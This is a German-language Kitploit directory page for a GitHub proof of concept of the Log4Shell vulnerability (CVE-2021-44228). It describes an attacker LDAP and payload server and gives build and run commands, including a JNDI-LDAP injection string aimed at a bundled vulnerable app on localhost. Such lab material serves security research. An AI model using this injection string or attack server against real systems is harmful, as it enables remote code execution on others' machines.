Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2021-44228-rce-poc — Ein Remote-Code-Execution-PoC für Log4Shell (CVE-2021-44228) | Kitploit
Tools/GitHubGitHub/ubitech/cve-2021-44228-rce-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHububitech/cve-2021-44228-rce-poc

cve-2021-44228-rce-poc

Ein Remote-Code-Execution-PoC für Log4Shell (CVE-2021-44228)

Repository anzeigen
321vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-44228 PoC für Remote-Befehlsausführung

Dieses Repository ermöglicht Sicherheitsforschern, mit Remote-Codeausführung zu experimentieren, indem es eine Implementierung eines Angriffsservers bereitstellt, der einen benutzerdefinierten Exploit auf einer verwundbaren Anwendung lädt, die Log4j enthält.

⚠️ Das Tool dient der Selbstbewertung und sollte nur von autorisierten Personen oder Forschern verwendet werden. Sie sollten nur Systeme testen, für die Sie ausdrückliche Erlaubnis oder Befugnis haben. Wenn Sie verwundbare Anwendungen oder Bibliotheken finden, sollten Sie verantwortungsvolle Offenlegung praktizieren.

RCE-Schritte

CVE-2021-44228 funktioniert, indem eine JNDI-LDAP-Zeichenfolge in Ihre Protokolle injiziert wird, die Log4j dazu veranlasst, den angegebenen LDAP-Server zu kontaktieren, um nach zusätzlichen Informationen zu suchen. In einem bösartigen Szenario kann der LDAP-Server dann Code an den Opferrechner zurückgeben, der automatisch im Arbeitsspeicher ausgeführt wird.

Das Repository enthält zwei Teilprojekte. Das Projekt attacker-server enthält den Quellcode von zwei Thread-basierten Servern. Der erste ist ein LDAP-Proxy, der die anfängliche Anforderung für ein LDAP-Objekt empfängt. Der zweite Server ist der Payload-Server, der den Exploit (in Exploit.java vorhanden) an die verwundbare Anwendung zurückgibt.

Erstellen

Im Stammverzeichnis des Projekts:

root@kitploit:~
mvn clean install

Sowohl der Server als auch die verwundbare Anwendung sollten bereit sein.

Den PoC ausführen

Um den Server zu laden, führen Sie aus:

root@kitploit:~
java -jar attacker-server/target/attacker-server-0.0.1-SNAPSHOT-jar-with-dependencies.jar

Um die RCE auszulösen, führen Sie aus:

root@kitploit:~
java -jar vulnapp/target/vulnapp-0.0.1-SNAPSHOT-jar-with-dependencies.jar \${jndi:ldap://127.0.0.1:1389/Exploit}

Sie können die bösartige Payload bei Bedarf ändern, indem Sie Exploit.java erweitern.

Tool herunterladen